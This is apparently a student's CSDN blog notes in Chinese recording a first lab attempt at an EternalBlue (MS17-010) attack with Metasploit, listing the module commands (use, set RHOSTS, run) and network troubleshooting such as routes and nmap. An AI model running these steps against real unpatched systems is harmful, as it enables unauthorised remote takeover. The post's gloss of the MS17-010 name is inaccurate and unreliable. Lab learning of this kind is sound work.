【浅浅试着用csdn做个笔记】第一次尝试用msf进行永恒之蓝攻击的记录

首先,附上学习视频链接:https://www.bilibili.com/video/BV163411972n?p=2&vd_source=477981387827d9c65f4d5ccb1e6869ea

然后记录一下整体思路:

记录一下一个新学的技巧:ctrl + shift + +可以对页面进行放大

step1,常规思路,切换到root获取最高权限(懒得切每次用sudo也行)

sudo su

或者打全了 (附:完整格式是 sudo su 用户名)

sudo su root

step2,启动metasploit

msfconsole

(每次启动metasploit都有新图,还挺好玩的,嘿嘿)

成功后开头如下(忽略那个突兀的水印)。6代表的是metasploit的版本

得到靶机(攻击对象)的ip地址,首先ping看看

ping ip地址

确保有time = 0.0x ms的出现。ping不会自动终止,需要 ctrl+c强行终止。

查找能攻击永恒之蓝漏洞的脚本(ms17_010是用windows官方给永恒之蓝的编号,表示windows2017年10号漏洞。可以去官网查找更新文档里的编号。)

exploit是攻击脚本,auxiliary 是辅助脚本,检测漏洞

以下方式二选一使用脚本:

use 0
use exploit/windows/smb/ms17_010_eternalblue

查看模块设置

show options

或者

options

required表示是否必须,current setting下空着的即为未设置

设置攻击目标

set RHOSTS 靶机ip地址

再查看一下模块设置就会发现RHOSTS被填上了

模块设置里面的payload是攻击的一些设置,此处略过,LHOST是监听地址,ip对应本虚拟机ip;LPORT是端口,有近60000多个

发射!!

run

出现这个即表示发射成功,成功获取权限

总体上如果没有意外的话整个学习也就到此为止了。

所以下面是来记录一下遇到的一些问题的

————————————莫名喜欢用分割线呢————————————

尝试了多次,但总是异曲同工的taget。先前没有截图

总结以下尝试思路,以下情况仅在nat模式下,且源于学长建议,未进行尝试。技术太菜,还没学桥接。

1、检查route,查看本机到靶机的路由。确保没有绕到更远的路由

2、 使用tracepath/traceroute,查看流量走向。

具体了解可以参考如下:

https://blog.csdn.net/weixin_45217447/article/details/130246991

3、检查端口是否启用

nmap 端口号 主机ip

————————一些念念叨叨——————

折腾了几天,发现是window的虚拟机网络适配器设成桥接模式了(瘫

就,很难评吧。

但至少算是解决了(?

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值